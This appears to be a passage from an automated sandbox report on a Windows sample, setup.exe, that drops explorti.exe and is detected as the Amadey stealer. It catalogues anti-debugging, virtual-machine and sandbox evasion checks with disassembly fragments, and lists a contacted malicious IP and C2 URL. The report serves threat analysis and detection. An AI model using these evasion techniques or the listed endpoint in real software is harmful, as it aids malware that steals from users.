Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B76 second address: 5100B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B7B second address: 5100BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 8937h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FC169461A9Ah 0x00000012 jne 00007FC1DB220C28h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007FC169461A9Dh 0x00000020 pop ecx 0x00000021 pushfd 0x00000022 jmp 00007FC169461AA1h 0x00000027 add ecx, 70F49246h 0x0000002d jmp 00007FC169461AA1h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100BD4 second address: 5100C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f popad 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 jmp 00007FC16945A282h 0x00000018 mov ebx, dword ptr [esi] 0x0000001a pushad 0x0000001b push esi 0x0000001c movsx ebx, ax 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 mov bl, 14h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100C11 second address: 5100C2E instructions: 0x00000000 rdtsc 0x00000002 mov si, 378Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100C2E second address: 5100C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov bh, 3Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test ebx, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC16945A282h 0x00000014 popad 0x00000015 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 666B2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 11F6B2D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_05150DB0 rdtsc 0_2_05150DB0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 450 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4296 Thread sleep time: -54027s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4820 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4820 Thread sleep time: -112056s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep count: 450 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep time: -13500000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5480 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3696 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3696 Thread sleep time: -94047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: explorti.exe, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000006.00000002.2883573047.0000000000758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWSo
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: setup.exe, 00000000.00000002.1692432472.0000000001411000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorti.exe, 00000006.00000002.2883573047.0000000000758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.1691582983.00000000005BA000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1716995664.000000000114A000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1729377013.000000000114A000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: setup.exe, 00000000.00000003.1659828144.0000000001427000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_05150DB0 rdtsc 0_2_05150DB0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F8645B mov eax, dword ptr fs:[00000030h] 6_2_00F8645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F8A1C2 mov eax, dword ptr fs:[00000030h] 6_2_00F8A1C2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: explorti.exe, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: >Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F6D312 cpuid 6_2_00F6D312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F6CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00F6CB1A

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.setup.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1651021209.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1689016813.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2289232500.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1691354588.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1676236773.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1716934114.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1729291467.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1483206 Sample: setup.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 24 Found malware configuration 2->24 26 Antivirus detection for URL or domain 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 5 other signatures 2->30 6 setup.exe 5 2->6         started        10 explorti.exe 12 2->10         started        13 explorti.exe 2->13         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\explorti.exe, PE32 6->18 dropped 20 C:\Users\...\explorti.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 explorti.exe 6->15         started        22 185.215.113.19, 49737, 49738, 49739 WHOLESALECONNECTIONSNL Portugal 10->22 38 Hides threads from debuggers 10->38 40 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->40 42 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->42 file5 signatures6 process7 signatures8 44 Antivirus detection for dropped file 15->44 46 Detected unpacking (changes PE section rights) 15->46 48 Tries to detect sandboxes and other dynamic analysis tools (window names) 15->48 50 5 other signatures 15->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.19
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.19/Vi9leo/index.php true
  • Avira URL Cloud: phishing
 unknown